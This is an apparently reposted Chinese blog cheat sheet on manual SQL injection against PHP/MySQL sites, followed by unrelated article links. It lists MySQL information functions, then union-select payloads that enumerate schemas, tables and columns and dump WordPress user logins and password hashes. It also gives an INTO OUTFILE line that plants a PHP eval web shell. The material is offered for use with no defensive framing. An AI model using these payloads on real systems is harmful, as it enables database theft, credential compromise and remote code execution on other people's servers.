php手工注入笔记-白红宇

php手工注入笔记

阅读量：7001 次

发布时间：2019-06-27

本文共 1108 字，大约阅读时间需要 3 分钟。

PHP内置函数：

1:system_user() 系统用户名

2:user() 用户名

3:current_user 当前用户名

4:session_user()连接数据库的用户名

5:database() 数据库名

6:version() MYSQL数据库版本

7:load_file() MYSQL读取本地文件的函数

8:@@datadir 读取数据库路径

9:@@basedir MYSQL 安装路径

10:@@version_compile_os 操作系统

===========================================================================

爆信息：

and 1=2 union select group_concat(user(),0x7c,database(),0x7c,version())--

============================================================================

1,爆库

and 1=2 union select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA --

2,爆表

and 1=2 union select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x776f72647072657373--

3,爆字段

and 1=2 union select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_name=0x77705f7573657273--

4,爆密码

and 1=2 union select group_concat(user_login,0x7c,user_pass) from wordpress.wp_users--

=============================================================================

load_file()

select ‘<?php eval_r($_POST[cmd])?>' into outfile '物理路径'

转载于:https://www.cnblogs.com/secbook/archive/2012/07/22/2654865.html

你可能感兴趣的文章

如何正确处理 InterruptedException

数领科技|solidworks教程：solidworks快捷键汇总

查看>>

ansible自动部署 zabbix-agent 的模块

postgresql 9.6 安装并配置远程连接

查看>>

PC电源选购常见误区解惑

查看>>

使用LVS或者阿里云的SLB后如何获取访客真实的IP地址

Spring2.5学习笔记2-AOP-利用注解

查看>>